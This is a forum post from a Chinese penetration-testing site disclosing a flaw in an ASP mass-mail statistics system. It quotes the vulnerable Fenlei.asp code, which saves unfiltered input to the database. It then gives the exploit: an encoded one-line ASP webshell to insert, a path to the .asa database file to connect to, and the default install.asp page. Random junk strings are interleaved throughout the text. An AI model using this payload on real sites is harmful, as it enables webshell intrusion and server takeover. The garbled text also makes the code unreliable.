中国网络渗透测试联盟
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:14
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
) T" d! I" w, I+ R) _
* }. J8 I1 y6 J/ b
IF Request.QueryString("Action")="del" Then
+ e r5 a z* W8 y
ID=Request.QueryString("ID")
" Y a& m5 ~8 \* M# \
IF Countss ("tui","Fenlei",ID )<>0 then
. w: g o' h/ |+ ? r7 ~. X
'略
' V: I- s$ A/ p9 b2 K* | p
IF Request.QueryString("Action")="Add" Then
6 p, F3 f4 R' t( @
Tname=Request.Form("Typename")
6 W: x4 s# C2 S, }9 \# {1 }
Set Rs=Server.CreateObject("adodb.Recordset")
9 E1 l& v6 m- ~
Sql="Select * From Fenlei Order by id Desc "
( n) F/ l. F+ }8 Q6 `
Rs.Open Sql,Conn,1,3
6 I* D3 d1 ~3 c1 B# o/ c+ I0 |3 r
Rs.Addnew
1 ^% x8 Q- S& h/ r6 [0 M9 y! c5 S6 A: ]
Rs("Typename")=Tname
: R" v3 V. o1 c5 j1 X8 i
'略
, V8 g% f& ]8 E- p' C: E2 c1 ~! l4 m
Set Rs=Server.CreateObject("adodb.Recordset")
1 B- f: h/ L" Z4 y, d
Sql="Select * From Fenlei Order by id Desc "
, x( X/ C8 r9 a% a. F1 X! Q
Rs.Open Sql,Conn,1,1
2 ^4 N1 ^: G0 F! `& G7 Q7 e7 p6 }
'略
1 [7 K9 n! t* F+ L! V8 Y
%>
6 {3 G/ I$ m, s7 u l% l6 c
- I8 H$ p+ M$ E" R# O6 g6 ^
- h! ~& X, O- p
% T: @" b! i6 C9 G( T/ \
没有过滤,直接写入数据库。
5 F! u' F1 f9 l
$ \9 K9 x2 g% a* L/ D
利用方法:
" d, D9 G8 F- d+ M7 ^% V
0 w) C9 e6 _" s- b( v
插入:┼攠數畣整爠煥敵瑳∨≡┩>
% \! {5 Z& M$ J7 R7 `3 j& O4 u: X" P
. l* V- m" X( H4 [* k8 v1 {2 o) t
4 w. ^; z, d# E) h
连接:
http://www.xxx.com/###tongbaner.asa
3 R$ z' T+ b" U5 Q1 }
'默认安装文件:
! G+ O; z) G! S* d9 _0 K/ ?
'install.asp
`+ l" x' N) r
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2